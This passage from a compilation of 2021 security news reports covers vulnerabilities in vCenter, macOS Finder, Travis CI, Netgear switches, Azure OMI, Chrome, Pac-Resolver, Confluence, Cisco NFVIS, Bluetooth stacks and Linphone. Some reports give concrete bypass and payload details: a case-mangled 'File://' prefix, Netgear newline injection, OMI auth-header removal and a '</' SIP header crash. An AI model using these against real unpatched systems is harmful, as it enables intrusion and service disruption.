flaws are George Noseevich and Sergey Gerasimov of SolidLab LLC, alongside Hynek
Petrak of Schneider Electric, Yuval Lazar of Pentera, and Osama Alaa of
Malcrove.
"The ramifications of [CVE-2021-22005] are serious and it is a matter of time – likely minutes after the disclosure – before working exploits are publicly available," VMware said in an FAQ urging customers to immediately update their vCenter installations.
"With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spear-phishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence," the company added.
Unpatched High-Severity Vulnerability Affects Apple macOS Computers
6.10.21
Vulnerebility
Thehackernews
Cybersecurity researchers on Tuesday disclosed details of an unpatched zero-day vulnerability in macOS Finder that could be abused by remote adversaries to trick users into running arbitrary commands on the machines.
"A vulnerability in macOS Finder allows files whose extension is inetloc to execute arbitrary commands, these files can be embedded inside emails which if the user clicks on them will execute the commands embedded inside them without providing a prompt or warning to the user," SSD Secure Disclosure said in a write-up published today.
Park Minchan, an independent security researcher, has been credited with
reporting the vulnerability which affects macOS versions of Big Sur and prior.
The weakness arises due to the manner macOS processes INETLOC files — shortcuts to open internet locations such as RSS feeds, Telnet connections, or other online resources and local files — resulting in a scenario that allows commands embedded in those files to be executed without any warning.
"The case here INETLOC is referring to a 'file://' protocol which allows running
locally (on the user's computer) stored files," SSD said. "If the INETLOC file
is attached to an email, clicking on the attachment will trigger the
vulnerability without warning."
Although newer versions of macOS have blocked the 'file://' prefix, the flaw can
be still exploited by simply changing the protocol to 'File://' or 'fIle://' to
effectively circumvent the check. We have reached out to Apple, and we will
update the story if we hear back.
"Newer versions of macOS (from Big Sur) have blocked the 'file://' prefix (in the com.apple.generic-internet-location) however they did a case matching causing 'File://' or 'fIle://' to bypass the check," the advisory said. "We have notified Apple that 'FiLe://' (just mangling the value) doesn't appear to be blocked, but have not received any response from them since the report has been made. As far as we know, at the moment, the vulnerability has not been patched."
Travis CI Flaw Exposes Secrets of Thousands of Open Source Projects
19.9.21
Vulnerebility
Thehackernews
Continuous integration vendor Travis CI has patched a serious security flaw that
exposed API keys, access tokens, and credentials, potentially putting
organizations that use public source code repositories at risk of further
attacks.
The issue — tracked as CVE-2021-41077 — concerns unauthorized access and plunder of secret environment data associated with a public open-source project during the software build process. The problem is said to have lasted during an eight-day window between September 3 and September 10.
Felix Lange of Ethereum has been credited with discovering the leakage on September 7, with the company's Péter Szilágyi pointing out that "anyone could exfiltrate these and gain lateral movement into 1000s of [organizations]."
Travis CI is a hosted CI/CD (short for continuous integration and continuous deployment) solution used to build and test software projects hosted on source code repository systems like GitHub and Bitbucket.
"The desired behavior (if .travis.yml has been created locally by a customer, and added to git) is for a Travis service to perform builds in a way that prevents public access to customer-specific secret environment data such as signing keys, access credentials, and API tokens," the vulnerability description reads. "However, during the stated 8-day interval, secret data could be revealed to an unauthorized actor who forked a public repository and printed files during a build process."
In other words, a public repository forked from another one could file a pull request that could obtain secret environmental variables set in the original upstream repository. Travis CI, in its own documentation, notes that "Encrypted environment variables are not available to pull requests from forks due to the security risk of exposing such information to unknown code."
It has also acknowledged the risk of exposure stemming from an external pull request: "A pull request sent from a fork of the upstream repository could be manipulated to expose environment variables. The upstream repository's maintainer would have no protection against this attack, as pull requests can be sent by anyone who forks the repository on GitHub."
Szilágyi also called out Travis CI for downplaying the incident and failing to admit the "gravity" of the issue, while also urging GitHub to ban the company over its poor security posture and vulnerability disclosure processes. "After three days of pressure from multiple projects, [Travis CI] silently patched the issue on the 10th," Szilágyi tweeted. "No analysis, no security report, no post mortem, not warning any of their users that their secrets might have been stolen."
The Berlin-based DevOps platform company on September 13 published a terse "security bulletin," advising users to rotate their keys on a regular basis, and followed it up with a second notice on its community forums stating that it has no found no evidence the bug was exploited by malicious parties.
"Due to the extremely irresponsible way [Travis CI] handled this situation, and their subsequent refusal to warn their users about potentially leaked secrets, we can only recommend everyone to immediately and indefinitely transfer away from Travis," Szilágyi added.
Third Critical Bug Affects Netgear Smart Switches — Details and PoC Released
19.9.21
Vulnerebility
Thehackernews
New details have been
revealed about a recently remediated critical vulnerability in Netgear smart
switches that could be leveraged by an attacker to potentially execute malicious
code and take control of vulnerable devices.
The flaw — dubbed "Seventh Inferno" (CVSS score: 9.8) — is part of a trio of security weaknesses, called Demon's Cries (CVSS score: 9.8) and Draconian Fear (CVSS score: 7.8), that Google security engineer Gynvael Coldwind reported to the networking, storage, and security solutions provider.
The disclosure comes weeks after Netgear released patches to address the vulnerabilities earlier this month, on September 3.
Successful exploitation of Demon's Cries and Draconian Fear could grant a malicious party the ability to change the administrator password without actually having to know the previous password or hijack the session bootstrapping information, resulting in a full compromise of the device.
Now, in a new post sharing technical specifics about Seventh Inferno, Coldwind noted that the issue relates to a newline injection flaw in the password field during Web UI authentication, effectively enabling the attacker to create fake session files, and combine it with a reboot Denial of Service (DoS) and a post-authentication shell injection to get a fully valid session and execute any code as root user, thereby leading to full device compromise.
The reboot DoS is a technique designed to reboot the switch by exploiting the newline injection to write "2" into three different kernel configurations — "/proc/sys/vm/panic_on_oom," "/proc/sys/kernel/panic," and "/proc/sys/kernel/panic_on_oops" — in a manner that causes the device to compulsorily shut down and restart due to kernel panic when all the available RAM is consumed upon uploading a large file over HTTP.
"This vulnerability and exploit chain is actually quite interesting technically," Coldwind said. "In short, it goes from a newline injection in the password field, through being able to write a file with constant uncontrolled content of '2' (like, one byte 32h), through a DoS and session crafting (which yields an admin web UI user), to an eventual post-auth shell injection (which yields full root)."
The full list of models impacted by the three vulnerabilities is below —
GC108P (fixed in firmware version 1.0.8.2)
GC108PP (fixed in firmware version
1.0.8.2)
GS108Tv3 (fixed in firmware version 7.0.7.2)
GS110TPP (fixed in
firmware version 7.0.7.2)
GS110TPv3 (fixed in firmware version 7.0.7.2)
GS110TUP (fixed in firmware version 1.0.5.3)
GS308T (fixed in firmware
version 1.0.3.2)
GS310TP (fixed in firmware version 1.0.3.2)
GS710TUP
(fixed in firmware version 1.0.5.3)
GS716TP (fixed in firmware version
1.0.4.2)
GS716TPP (fixed in firmware version 1.0.4.2)
GS724TPP (fixed in
firmware version 2.0.6.3)
GS724TPv2 (fixed in firmware version 2.0.6.3)
GS728TPPv2 (fixed in firmware version 6.0.8.2)
GS728TPv2 (fixed in firmware
version 6.0.8.2)
GS750E (fixed in firmware version 1.0.1.10)
GS752TPP
(fixed in firmware version 6.0.8.2)
GS752TPv2 (fixed in firmware version
6.0.8.2)
MS510TXM (fixed in firmware version 1.0.4.2)
MS510TXUP (fixed in
firmware version 1.0.4.2)
Critical Flaws Discovered in Azure App That Microsoft Secretly Installs on Linux
VMs
19.9.21
Vulnerebility
Thehackernews
Microsoft on Tuesday addressed a quartet of security flaws as part of its Patch
Tuesday updates that could be abused by adversaries to target Azure cloud
customers and elevate privileges as well as allow for remote takeover of
vulnerable systems.
The list of flaws, collectively called OMIGOD by researchers from Wiz, affect a little-known software agent called Open Management Infrastructure that's automatically deployed in many Azure services -
CVE-2021-38647 (CVSS score: 9.8) - Open Management Infrastructure Remote Code
Execution Vulnerability
CVE-2021-38648 (CVSS score: 7.8) - Open Management
Infrastructure Elevation of Privilege Vulnerability
CVE-2021-38645 (CVSS
score: 7.8) - Open Management Infrastructure Elevation of Privilege
Vulnerability
CVE-2021-38649 (CVSS score: 7.0) - Open Management
Infrastructure Elevation of Privilege Vulnerability
Open Management
Infrastructure (OMI) is an open-source analogous equivalent of Windows
Management Infrastructure (WMI) but designed for Linux and UNIX systems such as
CentOS, Debian, Oracle Linux, Red Hat Enterprise Linux Server, SUSE Linux, and
Ubuntu that allows for monitoring, inventory management, and syncing
configurations across IT environments.
Azure customers on Linux machines, including users of Azure Automation, Azure Automatic Update, Azure Operations Management Suite (OMS), Azure Log Analytics, Azure Configuration Management, and Azure Diagnostics, are at risk of potential exploitation.
"When users enable any of these popular services, OMI is silently installed on their virtual machine, running at the highest privileges possible," Wiz security researcher Nir Ohfeld said. "This happens without customers' explicit consent or knowledge. Users simply click agree to log collection during set-up and they have unknowingly opted in."
"In addition to Azure cloud customers, other Microsoft customers are affected since OMI can be independently installed on any Linux machine and is frequently used on-premise," Ohfeld added.
Since the OMI agent runs as root with the highest privileges, the aforementioned vulnerabilities could be abused by external actors or low-privileged users to remotely execute code on target machines and escalate privileges, thereby enabling the threat actors to take advantage of the elevated permissions to mount sophisticated attacks.
The most critical of the four flaws is a remote code execution flaw arising out
of an internet-exposed HTTPS port like 5986, 5985, or 1270, allowing attackers
to obtain initial access to a target Azure environment and subsequently move
laterally within the network.
"This is a textbook RCE vulnerability that you would expect to see in the 90's – it's highly unusual to have one crop up in 2021 that can expose millions of endpoints," Ohfeld said. "With a single packet, an attacker can become root on a remote machine by simply removing the authentication header. It's that simple."
"OMI is just one example of a 'secret' software agent that's pre-installed and silently deployed in cloud environments. It's important to note that these agents exist not just in Azure but in [Amazon Web Services] and [Google Cloud Platform] as well."
Update: Microsoft on Thursday published additional guidance for the OMIGOD vulnerabilities, urging customers to apply the updates manually as and when they become available per the schedule outlined here. The security issues impact all versions of OMI below 1.6.8-1.
"Several Azure Virtual Machine (VM) management extensions use [the OMI] framework to orchestrate configuration management and log collection on Linux VMs," Microsoft Security Response Center said in a bulletin. "The remote code execution vulnerability only impacts customers using a Linux management solution (on-premises SCOM or Azure Automation State Configuration or Azure Desired State Configuration extension) that enables remote OMI management."
The development comes as Bad Packets reported mass scanning of Azure Linux-based servers vulnerable to the remote code execution flaw in an attempt to hijack vulnerable systems and mount further attacks, which, in turn, have been fueled by the public release of a proof-of-concept (PoC) exploit.
Microsoft Releases Patch for Actively Exploited Windows Zero-Day Vulnerability
19.9.21
Vulnerebility
Thehackernews
A day after Apple and Google rolled out urgent security updates, Microsoft has pushed software fixes as part of its monthly Patch Tuesday release cycle to plug 66 security holes affecting Windows and other components such as Azure, Office, BitLocker, and Visual Studio, including an actively exploited zero-day in its MSHTML Platform that came to light last week.
Of the 66 flaws, three are rated Critical, 62 are rated Important, and one is rated Moderate in severity. This is aside from the 20 vulnerabilities in the Chromium-based Microsoft Edge browser that the company addressed since the start of the month.
The most important of the updates concerns a patch for CVE-2021-40444 (CVSS score: 8.8), an actively exploited remote code execution vulnerability in MSHTML that leverages malware-laced Microsoft Office documents, with EXPMON researchers noting "the exploit uses logical flaws so the exploitation is perfectly reliable."
Also addressed is a publicly disclosed, but not actively exploited, zero-day flaw in Windows DNS. Designated as CVE-2021-36968, the elevation of privilege vulnerability is rated 7.8 in severity.
Other flaws of note resolved by Microsoft involve a number of remote code execution bugs in Open Management Infrastructure (CVE-2021-38647), Windows WLAN AutoConfig Service (CVE-2021-36965), Office (CVE-2021-38659), Visual Studio (CVE-2021-36952), and Word (CVE-2021-38656) as well as a memory corruption flaw in Windows Scripting Engine (CVE-2021-26435)
What's more, the Windows maker has rectified three privilege escalation flaws newly uncovered in its Print Spooler service (CVE-2021-38667, CVE-2021-38671, and CVE-2021-40447), while CVE-2021-36975 and CVE-2021-38639 (CVSS scores: 7.8), both of which relate to an elevation of privilege vulnerabilities in Win32k, are listed as 'exploitation more likely,' making it imperative that users move quickly to apply the security updates.
Software Patches From Other Vendors
Besides Microsoft, patches have also been
released by a number of other vendors to address several vulnerabilities,
including -
Adobe
Android
Apple
Cisco
Citrix
Linux distributions Oracle
Linux, Red Hat, and SUSE
SAP
Schneider Electric, and
Siemens
HP OMEN Gaming Hub Flaw Affects Millions of Windows Computers
19.9.21
Vulnerebility
Thehackernews
Cybersecurity
researchers on Tuesday disclosed details about a high-severity flaw in the HP
OMEN driver software that impacts millions of gaming computers worldwide,
leaving them open to an array of attacks.
Tracked as CVE-2021-3437 (CVSS score: 7.8), the vulnerabilities could allow threat actors to escalate privileges to kernel mode without requiring administrator permissions, allowing them to disable security products, overwrite system components, and even corrupt the operating system.
Cybersecurity firm SentinelOne, which discovered and reported the shortcoming to HP on February 17, said it found no evidence of in-the-wild exploitation. The computer hardware company has since released a security update to its customers to address these vulnerabilities.
The issues themselves are rooted in a component called OMEN Command Center that comes pre-installed on HP OMEN-branded laptops and desktops and can also be downloaded from the Microsoft Store. The software, in addition to monitoring the GPU, CPU, and RAM via a vitals dashboard, is designed to help fine-tune network traffic and overclock the gaming PC for faster computer performance.
"The problem is that HP OMEN Command Center includes a driver that, while ostensibly developed by HP, is actually a partial copy of another driver full of known vulnerabilities," SentinelOne researchers said in a report shared with The Hacker News.
"In the right circumstances, an attacker with access to an organization's network may also gain access to execute code on unpatched systems and use these vulnerabilities to gain local elevation of privileges. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement."
The driver in question is HpPortIox64.sys, which derives its functionality from OpenLibSys-developed WinRing0.sys — a problematic driver that emerged as the source of a local privilege escalation bug in EVGA Precision X1 software (CVE-2020-14979, CVSS score: 7.8) last year.
"WinRing0 allows users to read and write to arbitrary physical memory, read and modify the model-specific registers (MSRs), and read/write to IO ports on the host," researchers from SpecterOps noted in August 2020. "These features are intended by the driver's developers. However, because a low-privileged user can make these requests, they present an opportunity for local privilege escalation."
The core issue stems from the fact that the driver accepts input/output control (IOCTL) calls without applying any kind of ACL enforcement, thus allowing bad actors unrestricted access to the aforementioned features, including capabilities to overwrite a binary that's loaded by a privileged process and ultimately run code with elevated privileges.
"To reduce the attack surface provided by device drivers with exposed IOCTLs handlers, developers should enforce strong ACLs on device objects, verify user input and not expose a generic interface to kernel mode operations," the researchers said.
The findings mark the second time WinRing0.sys has come under the lens for causing security issues in HP products.
In October 2019, SafeBreach Labs revealed a critical vulnerability in HP Touchpoint Analytics software (CVE-2019-6333), which comes included with the driver, thus potentially allowing threat actors to leverage the component to read arbitrary kernel memory and effectively allowlist malicious payloads via a signature validation bypass.
Following the disclosure, enterprise firmware security company Eclypsium — as part of its "Screwed Drivers" initiative to compile a repository of insecure drivers and shed light on how they can be abused by attackers to gain control over Windows-based systems — dubbed WinRing0.sys a "wormhole driver by design."
The discovery is also the third in a series of security vulnerabilities affecting software drivers that have been uncovered by SentinelOne since the start of the year.
Earlier this May, the Mountain View-based company revealed details about multiple privilege escalation vulnerabilities in Dell's firmware update driver named "dbutil_2_3.sys" that went undisclosed for more than 12 years. Then in July, it also made public a high-severity buffer overflow flaw impacting "ssport.sys" and used in HP, Xerox, and Samsung printers that was found to have remained undetected since 2005.
Update Google Chrome to Patch 2 New Zero-Day Flaws Under Attack
19.9.21
Vulnerebility
Thehackernews
Google on Monday
released security updates for Chrome web browser to address a total of 11
security issues, two of which it says are actively exploited zero-days in the
wild.
Tracked as CVE-2021-30632 and CVE-2021-30633, the vulnerabilities concern an out of bounds write in V8 JavaScript engine and a use after free flaw in Indexed DB API respectively, with the internet giant crediting anonymous researchers for reporting the bugs on September 8.
As is typically the case, the company said it's "aware that exploits for CVE-2021-30632 and CVE-2021-30633 exist in the wild" without sharing additional specifics about how, when, and where the vulnerabilities were exploited, or the threat actors that may be abusing them.
With these two security shortcomings, Google has addressed a total of 11 zero-day vulnerabilities in Chrome since the start of the year —
CVE-2021-21148 - Heap buffer overflow in V8
CVE-2021-21166 - Object recycle
issue in audio
CVE-2021-21193 - Use-after-free in Blink
CVE-2021-21206 -
Use-after-free in Blink
CVE-2021-21220 - Insufficient validation of untrusted
input in V8 for x86_64
CVE-2021-21224 - Type confusion in V8
CVE-2021-30551 - Type confusion in V8
CVE-2021-30554 - Use-after-free in
WebGL
CVE-2021-30563 - Type confusion in V8
Chrome users are advised to
update to the latest version (93.0.4577.82) for Windows, Mac, and Linux by
heading to Settings > Help > 'About Google Chrome' to mitigate the risk
associated with the flaws.
Critical Bug Reported in NPM Package With Millions of Downloads Weekly
19.9.21
Vulnerebility
Thehackernews
A widely used NPM
package called 'Pac-Resolver' for the JavaScript programming language has been
remediated with a fix for a high-severity remote code execution vulnerability
that could be abused to run malicious code inside Node.js applications whenever
HTTP requests are sent.
The flaw, tracked as CVE-2021-23406, has a severity rating of 8.1 on the CVSS vulnerability scoring system and affects Pac-Resolver versions before 5.0.0.
A Proxy Auto-Configuration (PAC) file is a JavaScript function that determines whether web browser requests should be routed directly to the destination or forwarded to a web proxy server for a given hostname. PAC files are how proxy rules are distributed in enterprise environments.
"This package is used for PAC file support in Pac-Proxy-Agent, which is used in turn in Proxy-Agent, which then used all over the place as the standard go-to package for HTTP proxy auto-detection and configuration in Node.js," Tim Perry said in a write-up published late last month. "It's very popular: Proxy-Agent is used everywhere from AWS's CDK toolkit to the Mailgun SDK to the Firebase CLI."
CVE-2021-23406 has to do with how Pac-Proxy-Agent doesn't sandbox PAC files correctly, resulting in a scenario where an untrusted PAC file can be abused to break out of the sandbox entirely and run arbitrary code on the underlying operating system. This, however, necessitates that the attacker either resides on the local network, has the capability to tamper with the contents of the PAC file, or chains it with a second vulnerability to alter the proxy configuration.
"This is a well-known attack against the VM module, and it works because Node doesn't isolate the context of the 'sandbox' fully, because it's not really trying to provide serious isolation," Perry said. "The fix is simple: use a real sandbox instead of the VM built-in module."
Red Hat, in an independent advisory, said the vulnerable package is shipped with its Advanced Cluster Management for Kubernetes product, but noted it's "currently not aware of the vector to trigger the vulnerability in the affected component, furthermore the affected component is protected by user authentication lowering the potential impact of this vulnerability."
Microsoft Warns of Cross-Account Takeover Bug in Azure Container Instances
10.9.21 Vulnerebility
Thehackernews
Microsoft on Wednesday said it remediated a vulnerability in its Azure Container Instances (ACI) services that could have been exploited by a malicious actor "to access other customers' information" in what the researcher described as the "first cross-account container takeover in the public cloud."
An attacker exploiting the weakness could execute malicious commands on other users' containers, steal customer secrets and images deployed to the platform. The Windows maker did not share any additional specifics related to the flaw, save that affected customers "revoke any privileged credentials that were deployed to the platform before August 31, 2021."
Azure Container Instances is a managed service that allows users to run Docker containers directly in a serverless cloud environment, without requiring the use of virtual machines, clusters, or orchestrators.
Palo Alto Networks' Unit 42 threat intelligence team dubbed the vulnerability
"Azurescape," referring to how an attacker can leverage the cross-tenant
technique to escape their rogue ACI container, escalate privileges over a
multitenant Kubernetes cluster, and take control of impacted containers by
executing malicious code.
Breaking out of the container, the researchers said, was made possible due to an outdated container runtime used in ACI (runC v1.0.0-rc2), thereby making it possible to exploit CVE-2019-5736 (CVSS score: 8.6) to escape the container and get code execution with elevated privileges on the underlying host.
Microsoft said it notified select customers with containers running on the same Kubernetes cluster as that of the malicious container created by Palo Alto Networks to demonstrate the attack. The cluster is said to have hosted 100 customer pods and about 120 nodes, with the company stating it had no evidence bad actors had abused the flaw to carry out real-world intrusions, adding its investigation "surfaced no unauthorized access to customer data."
The disclosure is the second Azure-related flaw to come to light in a span of two weeks, the first one being a critical Cosmos database flaw that could have been potentially exploited to grant any Azure user full admin access to other customers' database instances without any authorization.
"This discovery highlights the need for cloud users to take a 'defense-in-depth' approach to securing their cloud infrastructure that includes continuous monitoring for threats — inside and outside the cloud platform," Unit 42 researchers Ariel Zelivanky and Yuval Avrahami said. "Discovery of Azurescape also underscores the need for cloud service providers to provide adequate access for outside researchers to study their environments, searching for unknown threats."
New 0-Day Attack Targeting Windows Users With Microsoft Office Documents
10.9.21
Vulnerebility
Thehackernews
Microsoft on Tuesday warned of an actively exploited zero-day flaw impacting Internet Explorer that's being used to hijack vulnerable Windows systems by leveraging weaponized Office documents.
Tracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.
"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents," the company said.
"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights," it added.
The Windows maker credited researchers from EXPMON and Mandiant for reporting the flaw, although the company did not disclose additional specifics about the nature of the attacks, the identity of the adversaries exploiting this zero-day, or their targets in light of real-world attacks.
EXPMON, in a tweet, noted it found the vulnerability after detecting a "highly sophisticated zero-day attack" aimed at Microsoft Office users, adding it passed on its findings to Microsoft on Sunday. "The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous)," EXPMON researchers said.
However, it's worth pointing out that the current attack can be suppressed if Microsoft Office is run with default configurations, wherein documents downloaded from the web are opened in Protected View or Application Guard for Office, which is designed to prevent untrusted files from accessing trusted resources in the compromised system.
Microsoft, upon completion of the investigation, is expected to either release a security update as part of its Patch Tuesday monthly release cycle or issue an out-of-band patch "depending on customer needs." In the interim, the Windows maker is urging users and organizations to disable all ActiveX controls in Internet Explorer to mitigate any potential attack.
Latest Atlassian Confluence Flaw Exploited to Breach Jenkins Project Server
10.9.21
Vulnerebility
Thehackernews
The maintainers of
Jenkins—a popular open-source automation server software—have disclosed a
security breach after unidentified threat actors gained access to one of their
servers by exploiting a recently disclosed vulnerability in Atlassian Confluence
service to install a cryptocurrency miner.
The "successful attack," which is believed to have occurred last week, was mounted against its Confluence service that had been deprecated since October 2019, leading the team to take the server offline, rotate privileged credentials, and reset passwords for developer accounts.
"At this time we have no reason to believe that any Jenkins releases, plugins, or source code have been affected," the company said in a statement published over the weekend.
The disclosure comes as the U.S. Cyber Command warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments.
Tracked as CVE-2021-26084 (CVSS score: 9.8), the flaw concerns an OGNL (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.
According to cybersecurity firm Censys, a search engine for finding internet devices, around 14,637 exposed and vulnerable Confluence servers were discovered right before details about the flaw became public on August 25, a number that has since dropped to 8,597 as of September 5 as companies continue to apply Atlassian's patches and pull afflicted servers from being reachable over the internet.
Critical Auth Bypass Bug Affect NETGEAR Smart Switches — Patch and PoC Released
10.9.21
Vulnerebility
Thehackernews
Networking, storage and security solutions provider Netgear on Friday issued patches to address three security vulnerabilities affecting its smart switches that could be abused by an adversary to gain full control of a vulnerable device.
The flaws, which were discovered and reported to Netgear by Google security engineer Gynvael Coldwind, impact the following models -
GC108P (fixed in firmware version 1.0.8.2)
GC108PP (fixed in firmware version
1.0.8.2)
GS108Tv3 (fixed in firmware version 7.0.7.2)
GS110TPP (fixed in
firmware version 7.0.7.2)
GS110TPv3 (fixed in firmware version 7.0.7.2)
GS110TUP (fixed in firmware version 1.0.5.3)
GS308T (fixed in firmware
version 1.0.3.2)
GS310TP (fixed in firmware version 1.0.3.2)
GS710TUP
(fixed in firmware version 1.0.5.3)
GS716TP (fixed in firmware version
1.0.4.2)
GS716TPP (fixed in firmware version 1.0.4.2)
GS724TPP (fixed in
firmware version 2.0.6.3)
GS724TPv2 (fixed in firmware version 2.0.6.3)
GS728TPPv2 (fixed in firmware version 6.0.8.2)
GS728TPv2 (fixed in firmware
version 6.0.8.2)
GS750E (fixed in firmware version 1.0.1.10)
GS752TPP
(fixed in firmware version 6.0.8.2)
GS752TPv2 (fixed in firmware version
6.0.8.2)
MS510TXM (fixed in firmware version 1.0.4.2)
MS510TXUP (fixed in
firmware version 1.0.4.2)
According to Coldwind, the flaws concern an
authentication bypass, an authentication hijacking, and a third
as-yet-undisclosed vulnerability that could grant an attacker the ability to
change the administrator password without actually having to know the previous
password or hijack the session bootstrapping information, resulting in a full
compromise of the device.
The three vulnerabilities have been given the codenames Demon's Cries (CVSS score: 9.8), Draconian Fear (CVSS score: 7.8), and Seventh Inferno (TBD).
"A funny bug related to authorization spawns from the fact that the password is obfuscated by being XORed with 'NtgrSmartSwitchRock," Coldwind said in a write-up explaining the authentication bypass. "However, due to the fact that in the handler of TLV type 10 an strlen() is called on the still obfuscated password, it makes it impossible to authenticate correctly with a password that happens to have the same character as the phrase above at a given position."
Draconian Fear, on the other hand, requires the attacker to either have the same IP address as the admin or be able to spoof the address through other means. In such a scenario, the malicious party can take advantage of the fact that the Web UI relies only on the IP and a trivially guessable "userAgent" string to flood the authentication endpoint with multiple requests, thereby "greatly increasing the odds of getting the session information before admin's browser gets it."
In light of the critical nature of the vulnerabilities, companies relying on the aforementioned Netgear switches are recommended to upgrade to the latest version as soon as possible to mitigate any potential exploitation risk.
Cisco Issues Patch for Critical Enterprise NFVIS Flaw — PoC Exploit Available
3.9.21
Vulnerebility
Thehackernews
Cisco has patched a
critical security vulnerability impacting its Enterprise Network Function
Virtualization Infrastructure Software (NFVIS) that could be exploited by an
attacker to take control of an affected system.
Tracked as CVE-2021-34746, the weakness has been rated 9.8 out of a maximum of 10 on the Common Vulnerability Scoring System (CVSS) and could allow a remote attacker to circumvent authentication and log in to a vulnerable device as an administrator.
The network equipment maker said it's aware of a publicly available proof-of-concept (PoC) exploit code targeting the vulnerability, but added it's not detected any successful weaponization attempts in the wild.
The issue is caused due to incomplete validation of user-supplied input that's
passed to an authentication script during the sign-in process, enabling an
attacker to inject parameters into an authentication request. "A successful
exploit could allow the attacker to bypass authentication and log in as an
administrator to the affected device," the company said in an advisory.
It's worth pointing out that enterprise NFVIS deployments are impacted by this vulnerability only if TACACS external authentication method is configured on a targeted device, which can be determined by running the "show running-config tacacs-server" command. "If the output of the show running-config tacacs-server command is No entries found, the TACACS external authentication feature is not enabled," the company noted.
The patches come a little over a week after Cisco rolled out updates to address a critical security vulnerability (CVE-2021-1577) affecting the Application Policy Infrastructure Controller (APIC) interface used in its Nexus 9000 Series Switches that could be potentially abused to read or write arbitrary files on a vulnerable system.
The company is also in the process of readying fixes for a zero-day bug (CVE-2021-1585) in its Adaptive Security Device Manager (ADSM) Launcher that could allow an unauthenticated, remote attacker to execute arbitrary code on a user's operating system.
New BrakTooth Flaws Leave Millions of Bluetooth-enabled Devices Vulnerable
3.9.21
Vulnerebility
Thehackernews
A set of new security
vulnerabilities has been disclosed in commercial Bluetooth stacks that could
enable an adversary to execute arbitrary code and, worse, crash the devices via
denial-of-service (DoS) attacks.
Collectively dubbed "BrakTooth" (referring to the Norwegian word "Brak" which translates to "crash"), the 16 security weaknesses span across 13 Bluetooth chipsets from 11 vendors such as Intel, Qualcomm, Zhuhai Jieli Technology, and Texas Instruments, covering an estimated 1,400 or more commercial products, including laptops, smartphones, programmable logic controllers, and IoT devices.
The flaws were disclosed by researchers from the ASSET (Automated Systems
SEcuriTy) Research Group at the Singapore University of Technology and Design
(SUTD).
"All the vulnerabilities […] can be triggered without any previous pairing or
authentication," the researchers noted. "The impact of our discovered
vulnerabilities is categorized into (I) crashes and (II) deadlocks. Crashes
generally trigger a fatal assertion, segmentation faults due to a buffer or heap
overflow within the SoC firmware. Deadlocks, in contrast, lead the target device
to a condition in which no further BT communication is possible."
The most severe of the 16 bugs is CVE-2021-28139, which affects the ESP32 SoC used in many Bluetooth-based appliances ranging from consumer electronics to industrial equipment. Arising due to a lack of an out-of-bounds check in the library, the flaw enables an attacker to inject arbitrary code on vulnerable devices, including erasing its NVRAM data.
Other vulnerabilities could result in the Bluetooth functionality getting entirely disabled via arbitrary code execution, or cause a denial-of-service condition in laptops and smartphones employing Intel AX200 SoCs. "This vulnerability allows an attacker to forcibly disconnect slave BT devices currently connected to AX200 under Windows or Linux Laptops," the researchers said. "Similarly, Android phones such as Pocophone F1 and Oppo Reno 5G experience BT disruptions."
Additionally, a third collection of flaws discovered in Bluetooth speakers,
headphones, and audio modules could be abused to freeze and even completely shut
down the devices, requiring the users to manually turn them back on.
Troublingly, all the aforementioned BrakTooth attacks could be carried out with
a readily available Bluetooth packet sniffer that costs less than $15.
While Espressif, Infineon (Cypress), and Bluetrum Technology have released firmware patches to rectify the identified vulnerabilities, Intel, Qualcomm, and Zhuhai Jieli Technology are said to be investigating the flaws or in the process of readying security updates. Texas Instruments, however, doesn't intend to release a fix unless "demanded by customers."
The ASSET group has also made available a proof-of-concept (PoC) tool that can be used by vendors producing Bluetooth SoCs, modules, and products to replicate the vulnerabilities and validate against BrakTooth attacks.
Linphone SIP Stack Bug Could Let Attackers Remotely Crash Client Devices
3.9.21
Vulnerebility
Thehackernews
Cybersecurity researchers on Tuesday disclosed details about a zero-click security vulnerability in the Linphone Session Initiation Protocol (SIP) stack that could be remotely exploited without any action from a victim to crash the SIP client and cause a denial-of-service (DoS) condition.
Tracked as CVE-2021-33056 (CVSS score: 7.5), the issue concerns a NULL pointer dereference vulnerability in the "belle-sip" component, a C-language library used to implement SIP transport, transaction, and dialog layers, with all versions prior to 4.5.20 affected by the flaw. The weakness was discovered and reported by industrial cybersecurity company Claroty.
Linphone is an open-source and cross-platform SIP client with support for voice and video calls, end-to-end encrypted messaging, and audio conference calls, among others. SIP, on the other hand, is a signaling protocol used for initiating, maintaining, and terminating real-time multimedia communication sessions for voice, video, and messaging applications over the internet.
To that end, the remotely exploitable vulnerability can be activated by adding a malicious forward slash ("</") to a SIP message header such as To (the call recipient), From (initiator of the call), or Diversion (redirect the destination endpoint), resulting in a crash of the SIP client application that uses the belle-sip library to handle and parse SIP messages.
"The underlying bug here is that non-SIP URIs are accepted as valid SIP header values," Claroty researcher Sharon Brizinov said in a write-up. "Therefore, a generic URI such as a simple single forward slash will be considered a SIP URI. This means that the given URI will not contain a valid SIP scheme (scheme will be NULL), and so when the [string] compare function is called with the non-existent scheme (NULL), a null pointer dereference will be triggered and crash the SIP client."
It's worth noting that the flaw is also a zero-click vulnerability as it's possible to cause the SIP client to crash simply by sending an INVITE SIP request with a specially-crafted From/To/Diversion header. As a consequence, any application that uses belle-sip to analyze SIP messages will be rendered unavailable upon receiving a malicious SIP "call."
Although the patches are available for the core protocol stack, it's essential that the updates are applied downstream by vendors that rely on the affected SIP stack in their products.
